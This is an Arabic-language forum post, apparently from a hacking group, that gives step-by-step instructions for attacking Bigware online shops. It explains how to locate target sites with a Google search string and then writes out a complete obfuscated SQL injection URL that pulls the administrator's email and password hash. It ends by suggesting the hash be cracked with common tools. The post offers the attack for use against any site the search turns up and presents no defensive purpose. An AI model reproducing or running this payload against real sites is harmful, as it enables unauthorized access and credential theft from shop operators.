اخواني في المنظمة سلام الله عليكم
ماراح اطول عليكم و ابدا بشرح ثغرة جديدة لازالت fresh
اول شي بتروح للعزيز google و بتبحث عن "Diese Shopsoftware wurde entwickelt von Bigware"
2/ بتدخل عاى أي موقع من المواقع الكتيرة اللي رح تظهر لك ودلك لأن الثغرة جديدة كما قلت
3/ بعدين بتروحفي عنوان الموقع للمكان الي مكتوب فيه على سبيل المثال :
http:/www.xxx.com/site/main_bigware_30.php?bigwareCsid=337ed47df32b34f223 fea92faf2570f3&pages_id=9
4/ وتغير بالكتابة التالية
main_bigware_53.php?op=results&pollid=-1/**/and/**/voteid=0/**/and/**/language_id=5/**/and/**/1=1/**/UnIOn/**/SeLeCt/**/ConCat(former_email_address,0x3a,former_password)/**/FrOM/**/former/**/WhEre/**/former_id=1/*
حتى يصبح
http:/www.xxx.com/site/main_bigware_53.php?op=results&pollid=-1/**/and/**/voteid=0/**/and/**/language_id=5/**/and/**/1=1/**/UnIOn/**/SeLeCt/**/ConCat(former_email_address,0x3a,former_password)/**/FrOM/**/former/**/WhEre/**/former_id=1/*
خللي بالك بنغير ابتداءا من /main_bigware_xx.php ...../.../ الخ
أخيرا يظهر لك عنوان و كلمة سر ال admin وما عليك غير انك تفك تشفير كامة السر بواحد من البرامج المعروفة او المواقع الكثيرة